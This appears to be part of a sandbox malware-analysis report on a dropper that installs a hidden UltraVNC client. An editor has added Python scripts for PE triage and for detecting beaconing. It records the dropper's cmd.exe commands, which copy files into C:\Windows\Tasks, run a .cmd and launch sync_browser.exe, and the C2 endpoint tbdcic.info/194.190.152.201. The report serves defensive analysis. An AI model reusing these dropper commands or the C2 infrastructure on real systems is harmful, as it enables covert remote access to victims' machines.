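The tables above are what a triage script would consume. The following is an added example by the editor, not part of the Joe Sandbox report and not code from the sample: it transcribes the section rows, the non-empty data directories, the file size from the process block below and a subset of the import names, then checks that each directory lives in the section it should, estimates how much of the 1,641,047-byte file lies outside the mapped sections, flags high-entropy and RWX sections, and tags the imports by behaviour. The 7.0 entropy threshold, the capability groupings and the overlay estimate are the editor's assumptions.

```python
"""Static triage of the PE section table, data directories and imports listed
in the report. Added example: all numbers and names are transcribed from the
page; thresholds and groupings are the editor's assumptions."""
from dataclasses import dataclass

FILE_SIZE = 1_641_047  # "File size" of Olz7TmvkEW.exe from the Target ID 0 block


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: float
    characteristics: frozenset


# Transcribed from the section table (entropy rounded to three decimals).
SECTIONS = [
    Section(".text", 0x1000, 0x130F0, 0x13200, 6.614, frozenset({"CODE", "EXECUTE", "READ"})),
    Section(".rdata", 0x15000, 0x3560, 0x3600, 5.594, frozenset({"INITIALIZED_DATA", "READ"})),
    Section(".data", 0x19000, 0x29EC, 0x800, 3.813, frozenset({"INITIALIZED_DATA", "READ", "WRITE"})),
    Section(".rsrc", 0x1C000, 0x309F0, 0x30A00, 7.468, frozenset({"INITIALIZED_DATA", "READ"})),
]

# Non-empty data directories from the report: name -> (RVA, size).
DIRECTORIES = {"IMPORT": (0x17324, 0xC8), "RESOURCE": (0x1C000, 0x309F0), "IAT": (0x15000, 0x364)}

# Subset of the report's import list that matters for triage.
IMPORTS = frozenset({
    "CreateProcessW", "ShellExecuteW", "ShellExecuteExW",
    "CreateJobObjectW", "AssignProcessToJobObject", "SetInformationJobObject",
    "FindFirstFileW", "FindNextFileW", "DeleteFileW", "RemoveDirectoryW", "SetFileTime",
    "CheckTokenMembership", "AllocateAndInitializeSid", "SetWindowsHookExW", "CallNextHookEx",
    "LoadLibraryA", "GetProcAddress", "FindResourceExA", "LoadResource", "LockResource", "SizeofResource",
})

# Editor's grouping of APIs into behaviours worth a second look (assumption).
CAPABILITIES = {
    "spawn-child-process": {"CreateProcessW", "ShellExecuteW", "ShellExecuteExW"},
    "job-object-control": {"CreateJobObjectW", "AssignProcessToJobObject", "SetInformationJobObject"},
    "enumerate-and-delete-files": {"FindFirstFileW", "FindNextFileW", "DeleteFileW", "RemoveDirectoryW"},
    "timestomp": {"SetFileTime"},
    "admin-token-check": {"CheckTokenMembership", "AllocateAndInitializeSid"},
    "windows-hook": {"SetWindowsHookExW", "CallNextHookEx"},
    "dynamic-api-resolution": {"LoadLibraryA", "GetProcAddress"},
    "embedded-resource-access": {"FindResourceExA", "LoadResource", "LockResource", "SizeofResource"},
}


def section_for_rva(rva, sections=SECTIONS):
    """Name of the section whose virtual range contains rva, or None."""
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + max(s.virtual_size, s.raw_size):
            return s.name
    return None


def directory_placement(directories=DIRECTORIES, sections=SECTIONS):
    """Section holding each data directory; a directory outside every section
    (or a resource directory not in .rsrc) points at a tampered header."""
    return {name: section_for_rva(rva, sections) for name, (rva, _) in directories.items()}


def overlay_lower_bound(file_size=FILE_SIZE, sections=SECTIONS):
    """Bytes that lie beyond all sections' raw data. The report omits
    PointerToRawData, so the header size is not subtracted: lower bound only."""
    return file_size - sum(s.raw_size for s in sections)


def high_entropy_sections(sections=SECTIONS, threshold=7.0):
    """Sections whose Shannon entropy suggests compressed or encrypted content."""
    return [s.name for s in sections if s.entropy >= threshold]


def writable_and_executable(sections=SECTIONS):
    """RWX sections, a common packer or self-modifying-code tell."""
    return [s.name for s in sections if {"EXECUTE", "WRITE"} <= s.characteristics]


def capabilities(imports=IMPORTS):
    """Capability tags for which at least one API is imported."""
    return {tag: sorted(apis & imports) for tag, apis in CAPABILITIES.items() if apis & imports}


if __name__ == "__main__":
    print("directory placement:", directory_placement())
    print("overlay >=", overlay_lower_bound(), "bytes")
    print("high-entropy sections:", high_entropy_sections(), "RWX:", writable_and_executable())
    for tag, apis in capabilities().items():
        print(f"  {tag}: {', '.join(apis)}")
```

The four sections account for 293,376 bytes of raw data, so at least 1.3 MB of the file sits past the last section. Together with a 7.47-entropy .rsrc and an import set built around CreateProcessW, job objects, file enumeration and deletion, that is the shape of an extraction stub carrying its payload outside the mapped image, which is consistent with the cmd.exe copy of `%CD%\*.*` into C:\Windows\Tasks recorded in the process blocks below. The directory check passes here (IMPORT and IAT in .rdata, RESOURCE in .rsrc); the interesting finding is the overlay, not the header.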
Timestamp                        SID      Signature                                                           Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-12-23T13:39:02.527504+0100  2035893  ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon  1         192.168.2.7  49918        194.190.152.201  443        TCP
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 23, 2024 13:37:54.621855021 CET  49762        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:37:54.621905088 CET  443          49762      194.190.152.201  192.168.2.7
Dec 23, 2024 13:37:54.622064114 CET  49762        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:37:54.622330904 CET  49762        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:37:54.622343063 CET  443          49762      194.190.152.201  192.168.2.7
Dec 23, 2024 13:37:54.622381926 CET  443          49762      194.190.152.201  192.168.2.7
Dec 23, 2024 13:37:54.733014107 CET  49764        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:37:54.733055115 CET  443          49764      194.190.152.201  192.168.2.7
Dec 23, 2024 13:37:54.733122110 CET  49764        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:37:54.733278990 CET  49764        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:37:54.733293056 CET  443          49764      194.190.152.201  192.168.2.7
Dec 23, 2024 13:37:54.733323097 CET  443          49764      194.190.152.201  192.168.2.7
Dec 23, 2024 13:38:05.880995989 CET  49790        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:38:05.881052017 CET  443          49790      194.190.152.201  192.168.2.7
Dec 23, 2024 13:38:05.881278992 CET  49790        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:38:05.881357908 CET  49790        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:38:05.881366968 CET  443          49790      194.190.152.201  192.168.2.7
Dec 23, 2024 13:38:05.881460905 CET  443          49790      194.190.152.201  192.168.2.7
Dec 23, 2024 13:38:29.055135012 CET  49840        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:38:29.055192947 CET  443          49840      194.190.152.201  192.168.2.7
Dec 23, 2024 13:38:29.055327892 CET  49840        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:38:29.055552959 CET  49840        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:38:29.055557966 CET  443          49840      194.190.152.201  192.168.2.7
Dec 23, 2024 13:38:29.055779934 CET  443          49840      194.190.152.201  192.168.2.7
Dec 23, 2024 13:39:02.524259090 CET  49918        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:39:02.524324894 CET  443          49918      194.190.152.201  192.168.2.7
Dec 23, 2024 13:39:02.524431944 CET  49918        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:39:02.524542093 CET  49918        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:39:02.524557114 CET  443          49918      194.190.152.201  192.168.2.7
Dec 23, 2024 13:39:02.524708986 CET  443          49918      194.190.152.201  192.168.2.7
Dec 23, 2024 13:39:02.527503967 CET  49918        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:39:02.527532101 CET  443          49918      194.190.152.201  192.168.2.7
Dec 23, 2024 13:39:47.617419004 CET  49994        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:39:47.617491961 CET  443          49994      194.190.152.201  192.168.2.7
Dec 23, 2024 13:39:47.617597103 CET  49994        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:39:47.617749929 CET  49994        443        192.168.2.7      194.190.152.201
Dec 23, 2024 13:39:47.617767096 CET  443          49994      194.190.152.201  192.168.2.7
Dec 23, 2024 13:39:47.617832899 CET  443          49994      194.190.152.201  192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 23, 2024 13:37:48.194267035 CET  60338        53         192.168.2.7  1.1.1.1
Dec 23, 2024 13:37:54.378817081 CET  51165        53         192.168.2.7  1.1.1.1
Dec 23, 2024 13:37:54.516419888 CET  53           51165      1.1.1.1      192.168.2.7
Dec 23, 2024 13:38:11.148245096 CET  51209        53         192.168.2.7  1.1.1.1
Dec 23, 2024 13:38:11.287414074 CET  53           51209      1.1.1.1      192.168.2.7
Dec 23, 2024 13:38:25.547087908 CET  52419        53         192.168.2.7  1.1.1.1
Dec 23, 2024 13:38:25.685323954 CET  53           52419      1.1.1.1      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class        DNS over HTTPS
Dec 23, 2024 13:37:48.194267035 CET  192.168.2.7  1.1.1.1  0xd1d5    Standard query (0)  x1.i.lencr.org  A (IP address)  IN (0x0001)  false
Dec 23, 2024 13:37:54.378817081 CET  192.168.2.7  1.1.1.1  0xde31    Standard query (0)  tbdcic.info     A (IP address)  IN (0x0001)  false
Dec 23, 2024 13:38:11.148245096 CET  192.168.2.7  1.1.1.1  0xc553    Standard query (0)  tbdcic.info     A (IP address)  IN (0x0001)  false
Dec 23, 2024 13:38:25.547087908 CET  192.168.2.7  1.1.1.1  0x3805    Standard query (0)  tbdcic.info     A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                         CName                                    Address          Type                    Class        DNS over HTTPS
Dec 23, 2024 13:37:48.331319094 CET  1.1.1.1    192.168.2.7  0xd1d5    No error (0)  x1.i.lencr.org               crl.root-x1.letsencrypt.org.edgekey.net  -                CNAME (Canonical name)  IN (0x0001)  false
Dec 23, 2024 13:37:50.119189024 CET  1.1.1.1    192.168.2.7  0xc90e    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.214.172  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:37:50.119189024 CET  1.1.1.1    192.168.2.7  0xc90e    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.210.172  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:37:54.516419888 CET  1.1.1.1    192.168.2.7  0xde31    No error (0)  tbdcic.info                  -                                        194.190.152.201  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:38:11.287414074 CET  1.1.1.1    192.168.2.7  0xc553    No error (0)  tbdcic.info                  -                                        194.190.152.201  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:38:25.685323954 CET  1.1.1.1    192.168.2.7  0x3805    No error (0)  tbdcic.info                  -                                        194.190.152.201  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:38:37.211575031 CET  1.1.1.1    192.168.2.7  0xfb84    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.214.172  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:38:37.211575031 CET  1.1.1.1    192.168.2.7  0xfb84    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.210.172  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:38:50.084583998 CET  1.1.1.1    192.168.2.7  0x658e    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.210.172  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:38:50.084583998 CET  1.1.1.1    192.168.2.7  0x658e    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.214.172  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:39:14.183649063 CET  1.1.1.1    192.168.2.7  0x3069    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.210.172  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:39:14.183649063 CET  1.1.1.1    192.168.2.7  0x3069    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.214.172  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:39:38.312328100 CET  1.1.1.1    192.168.2.7  0x7b85    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.214.172  A (IP address)          IN (0x0001)  false
Dec 23, 2024 13:39:38.312328100 CET  1.1.1.1    192.168.2.7  0x7b85    No error (0)  bg.microsoft.map.fastly.net  -                                        199.232.210.172  A (IP address)          IN (0x0001)  false
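The TCP table shows six separate client connections to 194.190.152.201:443 (source ports 49762, 49764, 49790, 49840, 49918, 49994), each alive for a few milliseconds, and the Suricata alert's timestamp coincides with the client packet at 13:39:02.527503967 in the 49918 connection. The following is an added example by the editor, not part of the Joe Sandbox report: it parses packet rows in the layout above (two connections transcribed in full, the other four by their first packet only), groups them into connections, measures the interval between successive connections to the same endpoint, and ties the alert back to the connection and to the DNS answer that resolved tbdcic.info. The rule that the lower port number is the server side, the 1 s short-lived threshold and the minimum of four connections are the editor's assumptions.

```python
"""Beacon-interval check over the report's TCP rows and DNS answers.
Added example: packet rows are transcribed from the page (a subset);
the grouping heuristic and thresholds are the editor's assumptions."""
from collections import OrderedDict
from datetime import datetime, timedelta

# Subset of the TCP table: connections 49762 and 49918 in full, first packet of the rest.
TCP_ROWS = """
Dec 23, 2024 13:37:54.621855021 CET 49762 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:37:54.621905088 CET 443 49762 194.190.152.201 192.168.2.7
Dec 23, 2024 13:37:54.622064114 CET 49762 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:37:54.622330904 CET 49762 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:37:54.622343063 CET 443 49762 194.190.152.201 192.168.2.7
Dec 23, 2024 13:37:54.622381926 CET 443 49762 194.190.152.201 192.168.2.7
Dec 23, 2024 13:37:54.733014107 CET 49764 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:38:05.880995989 CET 49790 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:38:29.055135012 CET 49840 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:39:02.524259090 CET 49918 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:39:02.524324894 CET 443 49918 194.190.152.201 192.168.2.7
Dec 23, 2024 13:39:02.524431944 CET 49918 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:39:02.524542093 CET 49918 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:39:02.524557114 CET 443 49918 194.190.152.201 192.168.2.7
Dec 23, 2024 13:39:02.524708986 CET 443 49918 194.190.152.201 192.168.2.7
Dec 23, 2024 13:39:02.527503967 CET 49918 443 192.168.2.7 194.190.152.201
Dec 23, 2024 13:39:02.527532101 CET 443 49918 194.190.152.201 192.168.2.7
Dec 23, 2024 13:39:47.617419004 CET 49994 443 192.168.2.7 194.190.152.201
"""

DNS_ANSWERS = {"tbdcic.info": "194.190.152.201"}  # A record from the DNS answer table

# The Suricata alert from the report: timestamp, SID, message, src, sport, dst, dport.
ALERT = ("2024-12-23T13:39:02.527504+0100", 2035893,
         "ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon",
         "192.168.2.7", 49918, "194.190.152.201", 443)


def parse_ts(text):
    """'Dec 23, 2024 13:37:54.621855021 CET' -> naive datetime (ns truncated to us)."""
    base, frac = text.replace(" CET", "").rsplit(".", 1)
    return datetime.strptime(base, "%b %d, %Y %H:%M:%S") + timedelta(microseconds=int(frac[:6]))


def parse_rows(text=TCP_ROWS):
    """Rows in the report's layout -> (timestamp, sport, dport, src, dst) tuples."""
    rows = []
    for line in text.strip().splitlines():
        p = line.split()
        rows.append((parse_ts(" ".join(p[:5])), int(p[5]), int(p[6]), p[7], p[8]))
    return rows


def connections(rows):
    """Group packets by client 4-tuple; the side with the higher port is taken
    as the client (assumption: the client uses an ephemeral port)."""
    conns = OrderedDict()
    for ts, sport, dport, src, dst in rows:
        key = (src, sport, dst, dport) if sport > dport else (dst, dport, src, sport)
        c = conns.setdefault(key, {"first": ts, "last": ts, "packets": 0})
        c["first"], c["last"], c["packets"] = min(c["first"], ts), max(c["last"], ts), c["packets"] + 1
    return conns


def intervals(conns, server):
    """Seconds between the starts of successive connections to server=(ip, port)."""
    starts = sorted(c["first"] for (_, _, ip, port), c in conns.items() if (ip, port) == server)
    return [round((b - a).total_seconds(), 2) for a, b in zip(starts, starts[1:])]


def looks_like_beaconing(conns, server, min_connections=4, max_duration=1.0):
    """Many short-lived connections to one endpoint and no long-lived session:
    the shape a polling C2 client leaves. Returns (verdict, count, longest_s)."""
    mine = [c for (_, _, ip, port), c in conns.items() if (ip, port) == server]
    longest = max(((c["last"] - c["first"]).total_seconds() for c in mine), default=0.0)
    return len(mine) >= min_connections and longest < max_duration, len(mine), longest


def alert_context(conns, alert=ALERT, dns=DNS_ANSWERS):
    """Tie the IDS alert to the connection it fired in and to the resolved name."""
    _, sid, _, src, sport, dst, dport = alert
    conn = conns.get((src, sport, dst, dport))
    names = [n for n, a in dns.items() if a == dst]
    return {"sid": sid, "domain": names[0] if names else None,
            "connection_packets": conn["packets"] if conn else 0}


if __name__ == "__main__":
    conns = connections(parse_rows())
    server = ("194.190.152.201", 443)
    print("intervals:", intervals(conns, server))
    print("beaconing:", looks_like_beaconing(conns, server))
    print("alert:", alert_context(conns))
```

On the full table the gaps between connection starts are 0.11 s, 11.15 s, 23.17 s, 33.47 s and 45.09 s, so the client is not on a fixed timer but backs off after each short exchange; a detector that looks only for a constant period would miss it, which is why the check above keys on connection count and lifetime instead. The ET signature fired inside a connection, not on the DNS lookup, so the DNS answer is only the pivot that names the endpoint.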

                                                                    Target ID:0
                                                                    Start time:07:37:32
                                                                    Start date:23/12/2024
                                                                    Path:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Olz7TmvkEW.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'641'047 bytes
                                                                    MD5 hash:539B0FC32045DE3013D00850827654AA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:2
                                                                    Start time:07:37:33
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                                                                    Imagebase:0x410000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:07:37:33
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:07:37:33
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
                                                                    Imagebase:0x410000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:07:37:33
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:07:37:34
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
                                                                    Imagebase:0x410000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:7
                                                                    Start time:07:37:34
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:07:37:34
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 1
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:07:37:35
                                                                    Start date:23/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                                                                    Imagebase:0x7ff702560000
                                                                    File size:5'641'176 bytes
                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:11
                                                                    Start time:07:37:35
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 1
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:07:37:36
                                                                    Start date:23/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                    Imagebase:0x7ff6c3ff0000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:14
                                                                    Start time:07:37:36
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:taskkill /f /im sync_browser.exe
                                                                    Imagebase:0x580000
                                                                    File size:74'240 bytes
                                                                    MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:07:37:37
                                                                    Start date:23/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,1244757786394312861,11570424180585682022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                    Imagebase:0x7ff6c3ff0000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:16
                                                                    Start time:07:37:38
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 2
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:07:37:41
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 1
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:21
                                                                    Start time:07:37:43
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 2
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:07:37:45
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\Tasks\sync_browser.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Tasks\sync_browser.exe
                                                                    Imagebase:0x7ff7e5070000
                                                                    File size:1'945'368 bytes
                                                                    MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.1422085476.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Has exited:false

                                                                    Target ID:24
                                                                    Start time:07:37:45
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 8
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:09:28:56
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\Tasks\sync_browser.exe
                                                                    Wow64 process (32bit):false
